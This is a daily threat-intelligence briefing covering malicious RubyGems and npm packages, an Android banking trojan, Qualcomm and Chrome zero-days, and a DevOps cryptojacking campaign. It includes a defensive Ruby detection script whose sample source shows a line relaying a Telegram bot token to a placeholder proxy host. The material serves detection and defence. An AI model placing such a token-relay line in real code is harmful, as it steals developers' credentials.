Cyware Daily Threat Intelligence, June 03, 2025


Daily Threat Briefing June 3, 2025

A geopolitical ripple just triggered a global software supply chain scare. Socket has exposed a malicious campaign in the RubyGems ecosystem where two lookalike Fastlane plugins were used to siphon off Telegram bot tokens and messages. Timed around Vietnam’s Telegram ban, the attacker used typosquatting and subtle code tweaks - targeting affected developers and putting downstream users at risk worldwide.

A silent zero-day is loose in the wild, and Google’s racing to contain it. Chrome users are urged to update immediately after Google issued an emergency patch for a high-severity flaw in the V8 JavaScript engine that’s already being exploited.

Some attackers mine crypto, JINX-0132 mines misconfigurations. This threat actor is running a stealthy cryptojacking campaign against DevOps platforms, exploiting exposed defaults and overlooked RCE flaws. They stay under the radar while deploying XMRig miners across poorly secured cloud setups, many of which are still internet-facing and misconfigured.

Top Malware Reported in the Last 24 Hours

Supply chain attack targets RubyGems

Socket uncovered a supply chain attack in the RubyGems ecosystem involving two malicious gems, fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram, which impersonate legitimate Fastlane plugins. These gems exfiltrate Telegram bot tokens and messages by redirecting Telegram API calls through a proxy under the threat actor's control, exploiting the increased demand for such proxies that followed Vietnam's nationwide Telegram ban. The attack relies on typosquatting and minimal code changes, which makes detection difficult. The threat actor, operating under Vietnamese aliases, deliberately aligned the attack with geopolitical events to target the affected developers, with potential global exposure for anyone who installed the malicious gems.
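As an added defensive example (not code from Socket's report or from the gems involved), the Ruby script below applies two checks that follow from the technique described: flagging Fastlane plugin names that are near-duplicates of a trusted name, and flagging Bot-API-shaped URLs in gem source that do not point at api.telegram.org. It assumes fastlane-plugin-telegram is the legitimate plugin being impersonated and uses a constructed source snippet with a placeholder proxy host.

```ruby
require 'uri'
# Assumption: fastlane-plugin-telegram is the legitimate plugin the two gems impersonate.
PREFIX        = 'fastlane-plugin-'
TRUSTED_GEMS  = %w[fastlane-plugin-telegram].freeze
OFFICIAL_HOST = 'api.telegram.org'
MAX_DISTANCE  = 2 # edits a name token may be from a trusted token and still count as near

# Damerau-Levenshtein distance: insertion, deletion, substitution or adjacent swap cost 1.
def edit_distance(a, b)
  d = Array.new(a.size + 1) { |i| Array.new(b.size + 1) { |j| [i, j].max } }
  (1..a.size).each do |i|
    (1..b.size).each do |j|
      cost = a[i - 1] == b[j - 1] ? 0 : 1
      d[i][j] = [d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost].min
      d[i][j] = [d[i][j], d[i - 2][j - 2] + 1].min if i > 1 && j > 1 && a[i - 1] == b[j - 2] && a[i - 2] == b[j - 1]
    end
  end
  d[a.size][b.size]
end

# Flags a gem that shares the plugin prefix, is not itself trusted, and carries a name token
# near a trusted one: "telegram-proxy" keeps the token intact, "proxy_teleram" drops a letter.
def lookalike_gem?(name)
  return false if TRUSTED_GEMS.include?(name) || !name.start_with?(PREFIX)
  candidate = name.delete_prefix(PREFIX).split(/[-_]/)
  TRUSTED_GEMS.any? do |trusted|
    trusted.delete_prefix(PREFIX).split(/[-_]/).any? do |tok|
      candidate.any? { |ct| edit_distance(ct, tok) <= MAX_DISTANCE }
    end
  end
end

# Bot API calls look like https://api.telegram.org/bot<token>/<method>. Any URL with that path
# shape (or a host naming telegram) that points elsewhere is the redirection described above.
def suspicious_telegram_urls(source)
  source.scan(%r{https?://[^\s"'\#]+}).select do |raw|
    uri = URI.parse(raw)
    telegram_shaped = uri.path.start_with?('/bot') || uri.host.to_s.include?('telegram')
    telegram_shaped && uri.host != OFFICIAL_HOST
  rescue URI::InvalidURIError
    false
  end
end

# Constructed stand-in for plugin source: the first URL is legitimate, the second relays the
# bot token and message through a third-party host (placeholder name, not a real indicator).
SAMPLE_SOURCE = <<~'SRC'
  uri = URI("https://api.telegram.org/bot" + token + "/sendMessage")
  uri = URI("https://proxy.example.invalid/bot" + token + "/sendMessage")
SRC
```

Run `lookalike_gem?` over the names in a Gemfile.lock and `suspicious_telegram_urls` over each installed gem's source tree to produce a review list; both checks are heuristics meant to surface candidates, not to prove a gem malicious.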

Another day of malicious npm packages

Socket discovered four malicious npm packages—pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, and env-process—that target Binance Smart Chain (BSC) and Ethereum wallets. Created by the threat actor @crypto-exploit, these packages collectively received over 2,100 downloads. The first package, pancake_uniswap_validators_utils_snipe, was designed to drain crypto wallets by exfiltrating up to 85% of their balance using obfuscated JavaScript. The packages utilize environment variables to access sensitive data, including wallet addresses and private keys. The threat actor employs techniques like typosquatting and command obfuscation to evade detection and improve the effectiveness of their attacks.

Android malware Crocodilus evolves

A new Android banking trojan, Crocodilus, is actively targeting users in Europe, South America, and other regions, leveraging improved obfuscation techniques to evade detection. Initially discovered in March, Crocodilus masquerades as legitimate apps like Google Chrome and uses overlay attacks to steal credentials from financial apps. It also exploits accessibility permissions to extract cryptocurrency wallet seed phrases. Recent campaigns have expanded to countries like Poland, Argentina, Brazil, India, Indonesia, and the U.S., using tactics like fake Facebook ads and malicious websites to distribute the malware. New features include adding fake contacts to victims' contact lists to bypass fraud detection and collecting cryptocurrency wallet seed phrases via an automated parser.

Top Vulnerabilities Reported in the Last 24 Hours

Qualcomm patches three Adreno GPU bugs

Qualcomm has addressed three zero-day vulnerabilities in its Adreno GPUs that could be exploited in Android devices. Two flaws, CVE-2025-21479 and CVE-2025-21480, involve authorization issues leading to memory corruption, both rated CVSS 8.6. The third vulnerability, CVE-2025-27038, is a use-after-free issue in Chrome's GPU drivers, rated CVSS 7.5. Qualcomm has urged OEMs to deploy patches promptly due to indications of limited exploitation.

Google patches Chrome 0-day

Google has released an emergency update for Chrome to fix a high-severity zero-day vulnerability (CVE-2025-5419) in the V8 JavaScript engine, which is actively being exploited. This marks the third zero-day vulnerability addressed in 2025, following similar issues patched in March and May. Users are encouraged to update their browsers to versions 137.0.7151.68/.69 for Windows/Mac and 137.0.7151.68 for Linux. Detailed information about the exploits will be withheld until a majority of users have applied the fix.

Threats in Spotlight

Cryptojacking campaign targets DevOps tools

The threat actor JINX-0132 is behind a widespread cryptojacking campaign targeting popular DevOps applications, including Nomad, Consul, Docker, and Gitea. The campaign exploits known misconfigurations and vulnerabilities in these tools to deploy XMRig mining software on compromised servers. JINX-0132 avoids leaving traditional IOCs by using off-the-shelf tools downloaded from public GitHub repositories instead of custom malware. The group takes advantage of Nomad's insecure default configuration, which lets unauthorized users submit jobs that execute arbitrary commands. In Gitea, it exploits vulnerabilities such as post-authentication remote code execution, particularly in older versions. Approximately 25% of cloud environments use these technologies; 5% of them expose the services directly to the internet, and 30% of those exposed instances are misconfigured.
